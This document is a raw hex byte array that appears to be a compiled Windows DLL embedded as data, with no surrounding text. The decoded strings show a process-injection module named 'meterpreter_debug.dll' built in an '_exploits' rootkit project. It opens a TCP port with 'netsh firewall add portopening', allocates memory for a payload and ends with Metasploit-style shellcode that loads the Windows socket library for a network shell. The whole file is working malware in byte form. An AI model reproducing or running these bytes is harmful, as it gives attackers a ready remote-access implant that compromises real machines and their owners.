0xfc,0x51,0x68,0x00,0x10,0x00,0x10,0x6a,0x00,0x6a,0x00,0xff,0x15,0x14,0x20,0x00, 0x10,0x89,0x85,0xe4,0xfe,0xff,0xff,0x83,0xbd,0xe4,0xfe,0xff,0xff,0x00,0x74,0x1e, 0x6a,0xff,0x8b,0x95,0xe4,0xfe,0xff,0xff,0x52,0xff,0x15,0x10,0x20,0x00,0x10,0x8b, 0x85,0xe4,0xfe,0xff,0xff,0x50,0xff,0x15,0x0c,0x20,0x00,0x10,0xeb,0x1b,0xff,0x15, 0x08,0x20,0x00,0x10,0x50,0x68,0xbc,0x21,0x00,0x10,0x6a,0x38,0x68,0xd8,0x21,0x00, 0x10,0xe8,0x6a,0x02,0x00,0x00,0x83,0xc4,0x10,0x68,0x00,0x80,0x00,0x00,0x6a,0x00, 0x8b,0x4d,0xfc,0x51,0xff,0x15,0x30,0x20,0x00,0x10,0xeb,0x1b,0xff,0x15,0x08,0x20, 0x00,0x10,0x50,0x68,0xe8,0x21,0x00,0x10,0x6a,0x3f,0x68,0x04,0x22,0x00,0x10,0xe8, 0x3c,0x02,0x00,0x00,0x83,0xc4,0x10,0x68,0x14,0x22,0x00,0x10,0x6a,0x43,0x68,0x40, 0x22,0x00,0x10,0xe8,0x28,0x02,0x00,0x00,0x83,0xc4,0x0c,0x6a,0x00,0x68,0x50,0x22, 0x00,0x10,0xff,0x15,0x1c,0x20,0x00,0x10,0x89,0x85,0xec,0xfe,0xff,0xff,0x8b,0x95, 0xec,0xfe,0xff,0xff,0x52,0x68,0x90,0x22,0x00,0x10,0x6a,0x45,0x68,0xb4,0x22,0x00, 0x10,0xe8,0xfa,0x01,0x00,0x00,0x83,0xc4,0x10,0x68,0xc4,0x22,0x00,0x10,0x6a,0x47, 0x68,0xd8,0x22,0x00,0x10,0xe8,0xe6,0x01,0x00,0x00,0x83,0xc4,0x0c,0xff,0xb5,0xe8, 0xfe,0xff,0xff,0x68,0x00,0x80,0x00,0x00,0x6a,0x00,0xff,0x75,0x08,0xff,0x35,0x5c, 0x20,0x00,0x10,0xa1,0x30,0x20,0x00,0x10,0xff,0xe0,0x8b,0x85,0xe8,0xfe,0xff,0xff, 0x5f,0x5e,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x56,0x8b,0x74,0x24,0x08,0x57,0x8b,0x7c,0x24,0x14,0x33,0xc0,0x85,0xff,0x76,0x08, 0x88,0x04,0x30,0x40,0x3b,0xc7,0x72,0xf8,0x33,0xc0,0x85,0xff,0x76,0x13,0x8a,0x4c, 0x24,0x10,0x8a,0x14,0x30,0x32,0xd0,0x02,0xd1,0x88,0x14,0x30,0x40,0x3b,0xc7,0x72, 0xf1,0x5f,0x5e,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x8b,0x44,0x24,0x08,0x81,0xec,0x10,0x02,0x00,0x00,0x83,0xe8,0x01,0x0f,0x85,0xe4, 0x00,0x00,0x00,0x56,0x57,0x68,0x04,0x01,0x00,0x00,0x8d,0x84,0x24,0x18,0x01,0x00, 0x00,0x50,0x6a,0x00,0xc7,0x44,0x24,0x18,0x04,0x01,0x00,0x00,0xff,0x15,0x58,0x20, 0x00,0x10,0x50,0xff,0x15,0x2c,0x20,0x00,0x10,0x8d,0x4c,0x24,0x0c,0x51,0x8d,0x54, 0x24,0x14,0x52,0xff,0x15,0x00,0x20,0x00,0x10,0x8d,0x44,0x24,0x10,0x50,0xff,0x15, 0x20,0x20,0x00,0x10,0x50,0x8d,0x8c,0x24,0x1c,0x01,0x00,0x00,0x51,0x68,0xe8,0x22, 0x00,0x10,0x6a,0x7e,0x68,0x28,0x23,0x00,0x10,0xe8,0x02,0x01,0x00,0x00,0x8b,0xbc, 0x24,0x34,0x02,0x00,0x00,0x8b,0x77,0x3c,0x83,0xc4,0x18,0x8d,0x54,0x24,0x08,0x52, 0x03,0xf7,0xc7,0x44,0x24,0x0c,0x00,0x00,0x00,0x00,0x8b,0x46,0x54,0x6a,0x04,0x50, 0x57,0xff,0x15,0x28,0x20,0x00,0x10,0x85,0xc0,0x74,0x0f,0x8b,0x4e,0x54,0x51,0x6a, 0x00,0x57,0xe8,0x19,0xff,0xff,0xff,0x83,0xc4,0x0c,0x6a,0x00,0x6a,0x00,0x57,0x68, 0x10,0x10,0x00,0x10,0x6a,0x00,0x6a,0x00,0xff,0x15,0x14,0x20,0x00,0x10,0x5f,0x5e, 0x85,0xc0,0x74,0x15,0x50,0xff,0x15,0x0c,0x20,0x00,0x10,0xb8,0x01,0x00,0x00,0x00, 0x81,0xc4,0x10,0x02,0x00,0x00,0xc2,0x0c,0x00,0xff,0x15,0x08,0x20,0x00,0x10,0x50, 0x68,0x38,0x23,0x00,0x10,0x68,0x94,0x00,0x00,0x00,0x68,0x54,0x23,0x00,0x10,0xe8, 0x7c,0x00,0x00,0x00,0x83,0xc4,0x10,0xb8,0x01,0x00,0x00,0x00,0x81,0xc4,0x10,0x02, 0x00,0x00,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x6a,0x40,0x68,0x64,0x23,0x00,0x10,0x68,0x6c,0x23,0x00,0x10,0x6a,0x00,0xff,0x15, 0x68,0x20,0x00,0x10,0x6a,0x00,0xff,0x15,0x34,0x20,0x00,0x10,0xcc,0xcc,0xcc,0xcc, 0x53,0x8b,0x1d,0x38,0x20,0x00,0x10,0x55,0x56,0x57,0x8b,0x7c,0x24,0x14,0x57,0x8b, 0xef,0x33,0xf6,0xff,0xd3,0x85,0xc0,0x7e,0x1e,0x8d,0xa4,0x24,0x00,0x00,0x00,0x00, 0x8a,0x04,0x3e,0x3c,0x5c,0x74,0x04,0x3c,0x2f,0x75,0x04,0x8d,0x6c,0x3e,0x01,0x57, 0x46,0xff,0xd3,0x3b,0xf0,0x7c,0xe9,0x5f,0x5e,0x8b,0xc5,0x5d,0x5b,0xc3,0xcc,0xcc, 0x51,0x56,0x8b,0x35,0x54,0x20,0x00,0x10,0x57,0x68,0x7c,0x23,0x00,0x10,0x68,0x84, 0x23,0x00,0x10,0xff,0xd6,0x8b,0x3d,0x50,0x20,0x00,0x10,0x50,0xff,0xd7,0x89,0x44, 0x24,0x08,0x85,0xc0,0x0f,0x84,0xf1,0x00,0x00,0x00,0x55,0x68,0x90,0x23,0x00,0x10, 0x68,0x9c,0x23,0x00,0x10,0xff,0xd6,0x50,0xff,0xd7,0x8b,0xe8,0x85,0xed,0x0f,0x84, 0xd6,0x00,0x00,0x00,0x68,0xa8,0x23,0x00,0x10,0x68,0xb4,0x23,0x00,0x10,0xff,0xd6, 0x50,0xff,0xd7,0x85,0xc0,0x0f,0x84,0xbf,0x00,0x00,0x00,0x8b,0x54,0x24,0x1c,0x53, 0x8d,0x4c,0x24,0x24,0x51,0x52,0xff,0xd0,0x8b,0x1d,0x4c,0x20,0x00,0x10,0x8b,0xf8, 0x83,0xc4,0x08,0x81,0xc7,0x00,0x01,0x00,0x00,0x57,0x6a,0x00,0xff,0xd3,0x8b,0xf0, 0x85,0xf6,0x0f,0x84,0x91,0x00,0x00,0x00,0x57,0x6a,0x00,0xff,0xd3,0x8b,0xf8,0x85, 0xff,0x75,0x0d,0x56,0xff,0x15,0x48,0x20,0x00,0x10,0x5b,0x5d,0x5f,0x5e,0x59,0xc3, 0x8b,0x4c,0x24,0x20,0x8d,0x44,0x24,0x24,0x50,0x51,0x56,0xff,0xd5,0x8b,0x54,0x24, 0x28,0x8b,0x44,0x24,0x24,0x83,0xc4,0x0c,0x56,0x52,0x50,0xe8,0x00,0xff,0xff,0xff, 0x83,0xc4,0x04,0x50,0xff,0x15,0x20,0x20,0x00,0x10,0x50,0x68,0xc0,0x23,0x00,0x10, 0x57,0xff,0x54,0x24,0x28,0x83,0xc4,0x18,0x57,0xff,0x15,0x44,0x20,0x00,0x10,0x6a, 0xf5,0xff,0x15,0x40,0x20,0x00,0x10,0x8b,0xd8,0x83,0xfb,0xff,0x74,0x1f,0x6a,0x00, 0x8d,0x4c,0x24,0x14,0x51,0x56,0xc7,0x44,0x24,0x1c,0x00,0x00,0x00,0x00,0xff,0x15, 0x38,0x20,0x00,0x10,0x50,0x56,0x53,0xff,0x15,0x3c,0x20,0x00,0x10,0x57,0x8b,0x3d, 0x48,0x20,0x00,0x10,0xff,0xd7,0x56,0xff,0xd7,0x5b,0x5d,0x5f,0x5e,0x59,0xc3,0xcc, 0xff,0x25,0x5c,0x20,0x00,0x10,0xff,0x25,0x30,0x20,0x00,0x10,0xff,0x25,0x08,0x20, 0x00,0x10,0xff,0x25,0x0c,0x20,0x00,0x10,0xff,0x25,0x10,0x20,0x00,0x10,0xff,0x25, 0x14,0x20,0x00,0x10,0xff,0x25,0x18,0x20,0x00,0x10,0xff,0x25,0x1c,0x20,0x00,0x10, 0xff,0x25,0x20,0x20,0x00,0x10,0xff,0x25,0x24,0x20,0x00,0x10,0xff,0x25,0x28,0x20, 0x00,0x10,0xff,0x25,0x2c,0x20,0x00,0x10,0xff,0x25,0x58,0x20,0x00,0x10,0xff,0x25, 0x34,0x20,0x00,0x10,0xff,0x25,0x38,0x20,0x00,0x10,0xff,0x25,0x3c,0x20,0x00,0x10, 0xff,0x25,0x40,0x20,0x00,0x10,0xff,0x25,0x44,0x20,0x00,0x10,0xff,0x25,0x48,0x20, 0x00,0x10,0xff,0x25,0x4c,0x20,0x00,0x10,0xff,0x25,0x50,0x20,0x00,0x10,0xff,0x25, 0x54,0x20,0x00,0x10,0xff,0x25,0x64,0x20,0x00,0x10,0xff,0x25,0x68,0x20,0x00,0x10, 0xff,0x25,0x00,0x20,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x36,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0xb4,0x24,0x00,0x00,0xc4,0x24,0x00,0x00, 0xd2,0x24,0x00,0x00,0xe8,0x24,0x00,0x00,0xf8,0x24,0x00,0x00,0x08,0x25,0x00,0x00, 0x12,0x25,0x00,0x00,0x28,0x25,0x00,0x00,0x3e,0x25,0x00,0x00,0x50,0x25,0x00,0x00, 0xa6,0x24,0x00,0x00,0x7a,0x25,0x00,0x00,0x88,0x25,0x00,0x00,0x94,0x25,0x00,0x00, 0xa0,0x25,0x00,0x00,0xb0,0x25,0x00,0x00,0xc6,0x25,0x00,0x00,0xd2,0x25,0x00,0x00, 0xe0,0x25,0x00,0x00,0xf2,0x25,0x00,0x00,0x66,0x25,0x00,0x00,0x98,0x24,0x00,0x00, 0x00,0x00,0x00,0x00,0x10,0x26,0x00,0x00,0x1c,0x26,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00, 0x61,0x00,0x00,0x00,0xb0,0x26,0x00,0x00,0xb0,0x10,0x00,0x00,0x4d,0x61,0x69,0x6e, 0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x54,0x68,0x72,0x65,0x61,0x64, 0x20,0x25,0x78,0x3a,0x25,0x78,0x20,0x73,0x74,0x61,0x72,0x74,0x65,0x64,0x0a,0x00, 0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00, 0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x41,0x64, 0x64,0x69,0x6e,0x67,0x20,0x66,0x69,0x72,0x65,0x77,0x61,0x6c,0x6c,0x20,0x72,0x75, 0x6c,0x65,0x20,0x66,0x6f,0x72,0x20,0x54,0x43,0x50,0x20,0x70,0x6f,0x72,0x74,0x20, 0x25,0x64,0x2e,0x2e,0x2e,0x0a,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69, 0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x63,0x6d,0x64,0x2e,0x65,0x78,0x65,0x20, 0x2f,0x43,0x20,0x6e,0x65,0x74,0x73,0x68,0x20,0x66,0x69,0x72,0x65,0x77,0x61,0x6c, 0x6c,0x20,0x61,0x64,0x64,0x20,0x70,0x6f,0x72,0x74,0x6f,0x70,0x65,0x6e,0x69,0x6e, 0x67,0x20,0x54,0x43,0x50,0x20,0x25,0x64,0x20,0x53,0x79,0x73,0x74,0x65,0x6d,0x00, 0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x44,0x6f, 0x6e,0x65,0x20,0x28,0x65,0x78,0x69,0x74,0x20,0x63,0x6f,0x64,0x65,0x3a,0x20,0x25, 0x64,0x29,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70, 0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29, 0x3a,0x20,0x41,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65,0x64,0x20,0x25,0x64,0x20,0x62, 0x79,0x74,0x65,0x73,0x20,0x66,0x6f,0x72,0x20,0x70,0x61,0x79,0x6c,0x6f,0x61,0x64, 0x20,0x61,0x74,0x20,0x30,0x78,0x25,0x78,0x0a,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c, 0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x43,0x72,0x65,0x61, 0x74,0x65,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52, 0x20,0x25,0x64,0x0a,0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69, 0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x41, 0x6c,0x6c,0x6f,0x63,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x20,0x25,0x64,0x0a, 0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70, 0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29, 0x3a,0x20,0x44,0x65,0x6c,0x65,0x74,0x69,0x6e,0x67,0x20,0x66,0x69,0x72,0x65,0x77, 0x61,0x6c,0x6c,0x20,0x72,0x75,0x6c,0x65,0x2e,0x2e,0x2e,0x0a,0x00,0x00,0x00,0x00, 0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00, 0x63,0x6d,0x64,0x2e,0x65,0x78,0x65,0x20,0x2f,0x43,0x20,0x6e,0x65,0x74,0x73,0x68, 0x20,0x61,0x64,0x76,0x66,0x69,0x72,0x65,0x77,0x61,0x6c,0x6c,0x20,0x66,0x69,0x72, 0x65,0x77,0x61,0x6c,0x6c,0x20,0x64,0x65,0x6c,0x65,0x74,0x65,0x20,0x72,0x75,0x6c, 0x65,0x20,0x6e,0x61,0x6d,0x65,0x3d,0x53,0x79,0x73,0x74,0x65,0x6d,0x00,0x00,0x00, 0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x44,0x6f, 0x6e,0x65,0x20,0x28,0x65,0x78,0x69,0x74,0x20,0x63,0x6f,0x64,0x65,0x3a,0x20,0x25, 0x64,0x29,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70, 0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29, 0x3a,0x20,0x45,0x58,0x49,0x54,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69, 0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x44,0x6c,0x6c,0x4d,0x61,0x69,0x6e,0x28, 0x29,0x3a,0x20,0x49,0x6e,0x6a,0x65,0x63,0x74,0x65,0x64,0x20,0x69,0x6e,0x74,0x6f, 0x20,0x70,0x72,0x6f,0x63,0x65,0x73,0x73,0x20,0x22,0x25,0x73,0x22,0x20,0x28,0x50, 0x49,0x44,0x3d,0x25,0x64,0x29,0x2c,0x20,0x55,0x73,0x65,0x72,0x20,0x3d,0x20,0x22, 0x25,0x73,0x22,0x0a,0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69, 0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x43,0x72,0x65,0x61,0x74,0x65,0x54,0x68, 0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x20,0x25,0x64,0x0a, 0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70, 0x70,0x00,0x00,0x00,0x44,0x75,0x6d,0x6d,0x79,0x28,0x29,0x00,0x3c,0x4f,0x4b,0x3e, 0x20,0x74,0x6f,0x20,0x65,0x78,0x69,0x74,0x2e,0x2e,0x2e,0x00,0x73,0x70,0x72,0x69, 0x6e,0x74,0x66,0x00,0x6d,0x73,0x76,0x63,0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00, 0x76,0x73,0x70,0x72,0x69,0x6e,0x74,0x66,0x00,0x00,0x00,0x00,0x6d,0x73,0x76,0x63, 0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00,0x5f,0x76,0x73,0x63,0x70,0x72,0x69,0x6e, 0x74,0x66,0x00,0x00,0x6d,0x73,0x76,0x63,0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00, 0x5b,0x25,0x2e,0x35,0x64,0x5d,0x20,0x2e,0x5c,0x25,0x73,0x28,0x25,0x64,0x29,0x20, 0x3a,0x20,0x25,0x73,0x00,0x00,0x00,0x00,0x30,0x24,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x02,0x26,0x00,0x00,0x08,0x20,0x00,0x00,0x8c,0x24,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2a,0x26,0x00,0x00,0x64,0x20,0x00,0x00, 0x28,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x26,0x00,0x00, 0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x36,0x26,0x00,0x00,0x00,0x00,0x00,0x00, 0xb4,0x24,0x00,0x00,0xc4,0x24,0x00,0x00,0xd2,0x24,0x00,0x00,0xe8,0x24,0x00,0x00, 0xf8,0x24,0x00,0x00,0x08,0x25,0x00,0x00,0x12,0x25,0x00,0x00,0x28,0x25,0x00,0x00, 0x3e,0x25,0x00,0x00,0x50,0x25,0x00,0x00,0xa6,0x24,0x00,0x00,0x7a,0x25,0x00,0x00, 0x88,0x25,0x00,0x00,0x94,0x25,0x00,0x00,0xa0,0x25,0x00,0x00,0xb0,0x25,0x00,0x00, 0xc6,0x25,0x00,0x00,0xd2,0x25,0x00,0x00,0xe0,0x25,0x00,0x00,0xf2,0x25,0x00,0x00, 0x66,0x25,0x00,0x00,0x98,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x26,0x00,0x00, 0x1c,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x01,0x45,0x78,0x69,0x74,0x54,0x68, 0x72,0x65,0x61,0x64,0x00,0x00,0x57,0x04,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x46, 0x72,0x65,0x65,0x00,0xe6,0x01,0x47,0x65,0x74,0x4c,0x61,0x73,0x74,0x45,0x72,0x72, 0x6f,0x72,0x00,0x00,0x43,0x00,0x43,0x6c,0x6f,0x73,0x65,0x48,0x61,0x6e,0x64,0x6c, 0x65,0x00,0x64,0x04,0x57,0x61,0x69,0x74,0x46,0x6f,0x72,0x53,0x69,0x6e,0x67,0x6c, 0x65,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0xa3,0x00,0x43,0x72,0x65,0x61,0x74,0x65, 0x54,0x68,0x72,0x65,0x61,0x64,0x00,0x00,0x54,0x04,0x56,0x69,0x72,0x74,0x75,0x61, 0x6c,0x41,0x6c,0x6c,0x6f,0x63,0x00,0x00,0x7b,0x04,0x57,0x69,0x6e,0x45,0x78,0x65, 0x63,0x00,0xaa,0x01,0x47,0x65,0x74,0x43,0x75,0x72,0x72,0x65,0x6e,0x74,0x50,0x72, 0x6f,0x63,0x65,0x73,0x73,0x49,0x64,0x00,0xad,0x01,0x47,0x65,0x74,0x43,0x75,0x72, 0x72,0x65,0x6e,0x74,0x54,0x68,0x72,0x65,0x61,0x64,0x49,0x64,0x00,0x00,0x5a,0x04, 0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x50,0x72,0x6f,0x74,0x65,0x63,0x74,0x00,0x00, 0xf4,0x01,0x47,0x65,0x74,0x4d,0x6f,0x64,0x75,0x6c,0x65,0x46,0x69,0x6c,0x65,0x4e, 0x61,0x6d,0x65,0x41,0x00,0x00,0xf6,0x01,0x47,0x65,0x74,0x4d,0x6f,0x64,0x75,0x6c, 0x65,0x48,0x61,0x6e,0x64,0x6c,0x65,0x41,0x00,0x00,0x04,0x01,0x45,0x78,0x69,0x74, 0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0xb5,0x04,0x6c,0x73,0x74,0x72,0x6c,0x65, 0x6e,0x41,0x00,0x00,0x8d,0x04,0x57,0x72,0x69,0x74,0x65,0x46,0x69,0x6c,0x65,0x00, 0x3b,0x02,0x47,0x65,0x74,0x53,0x74,0x64,0x48,0x61,0x6e,0x64,0x6c,0x65,0x00,0x00, 0x3a,0x03,0x4f,0x75,0x74,0x70,0x75,0x74,0x44,0x65,0x62,0x75,0x67,0x53,0x74,0x72, 0x69,0x6e,0x67,0x41,0x00,0x00,0xfd,0x02,0x4c,0x6f,0x63,0x61,0x6c,0x46,0x72,0x65, 0x65,0x00,0xf9,0x02,0x4c,0x6f,0x63,0x61,0x6c,0x41,0x6c,0x6c,0x6f,0x63,0x00,0x00, 0x20,0x02,0x47,0x65,0x74,0x50,0x72,0x6f,0x63,0x41,0x64,0x64,0x72,0x65,0x73,0x73, 0x00,0x00,0xf1,0x02,0x4c,0x6f,0x61,0x64,0x4c,0x69,0x62,0x72,0x61,0x72,0x79,0x41, 0x00,0x00,0x4b,0x45,0x52,0x4e,0x45,0x4c,0x33,0x32,0x2e,0x64,0x6c,0x6c,0x00,0x00, 0x07,0x03,0x77,0x73,0x70,0x72,0x69,0x6e,0x74,0x66,0x41,0x00,0xf8,0x01,0x4d,0x65, 0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x41,0x00,0x55,0x53,0x45,0x52,0x33,0x32, 0x2e,0x64,0x6c,0x6c,0x00,0x00,0x5e,0x01,0x47,0x65,0x74,0x55,0x73,0x65,0x72,0x4e, 0x61,0x6d,0x65,0x41,0x00,0x00,0x41,0x44,0x56,0x41,0x50,0x49,0x33,0x32,0x2e,0x64, 0x6c,0x6c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x92,0x26,0x00,0x00, 0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x88,0x26,0x00,0x00, 0x8c,0x26,0x00,0x00,0x90,0x26,0x00,0x00,0x60,0x13,0x00,0x00,0xa8,0x26,0x00,0x00, 0x00,0x00,0x6d,0x65,0x74,0x65,0x72,0x70,0x72,0x65,0x74,0x65,0x72,0x5f,0x64,0x65, 0x62,0x75,0x67,0x2e,0x64,0x6c,0x6c,0x00,0x44,0x75,0x6d,0x6d,0x79,0x00,0x00,0x00, 0x52,0x53,0x44,0x53,0x82,0x5a,0x19,0x91,0x44,0xdc,0xaa,0x48,0x8a,0xc8,0x7d,0xac, 0xf1,0xd6,0xba,0x09,0x01,0x00,0x00,0x00,0x58,0x3a,0x5c,0x64,0x65,0x76,0x5c,0x5f, 0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x73,0x5c,0x5f,0x4c,0x6f,0x63,0x61,0x6c,0x5c, 0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x52,0x65,0x67,0x69,0x73,0x74,0x72,0x79,0x52, 0x6f,0x6f,0x74,0x6b,0x69,0x74,0x5c,0x73,0x72,0x63,0x5c,0x6d,0x65,0x74,0x65,0x72, 0x70,0x72,0x65,0x74,0x65,0x72,0x5f,0x64,0x65,0x62,0x75,0x67,0x2e,0x70,0x64,0x62, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b, 0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0, 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57, 0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01, 0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b, 0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4, 0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b, 0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24, 0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d, 0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07, 